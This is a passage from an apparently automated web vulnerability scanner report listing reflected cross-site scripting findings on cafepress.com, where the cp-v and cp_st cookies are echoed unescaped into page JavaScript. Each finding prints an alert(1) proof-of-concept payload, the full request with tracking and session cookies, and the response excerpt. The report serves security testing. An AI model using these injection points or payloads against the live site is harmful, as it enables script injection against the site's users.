__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 71897
Date: Sun, 26 Dec 2010 13:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.127. http://www.cafepress.com/make/personalized-gifts [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/personalized-gifts

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73b12</script><script>alert(1)</script>ef50e1d8ced was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/personalized-gifts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=73b12</script><script>alert(1)</script>ef50e1d8ced; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 71920
Date: Sun, 26 Dec 2010 13:47:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '73b12</script><script>alert(1)</script>ef50e1d8ced'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.128. http://www.cafepress.com/make/personalized-ornaments [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/personalized-ornaments

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac27"-alert(1)-"47b4bca4067 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/personalized-ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 54274
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.129. http://www.cafepress.com/make/personalized-ornaments [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/personalized-ornaments

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d007</script><script>alert(1)</script>1409bed2e4a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/personalized-ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4d007</script><script>alert(1)</script>1409bed2e4a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 54293
Date: Sun, 26 Dec 2010 13:48:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '4d007</script><script>alert(1)</script>1409bed2e4a'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.130. http://www.cafepress.com/make/photo-on-canvas [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/photo-on-canvas

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 390f6"-alert(1)-"cf485b1a7be was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/photo-on-canvas HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 64044
Date: Sun, 26 Dec 2010 13:47:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 64044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.131. http://www.cafepress.com/make/photo-on-canvas [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/photo-on-canvas

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa097</script><script>alert(1)</script>ac2f65e7c84 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/photo-on-canvas HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=aa097</script><script>alert(1)</script>ac2f65e7c84; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 63812
Date: Sun, 26 Dec 2010 13:47:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 63812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'aa097</script><script>alert(1)</script>ac2f65e7c84'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.132. http://www.cafepress.com/sk/TheGamingApe [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /sk/TheGamingApe

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ba9"-alert(1)-"3e702ef6992 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

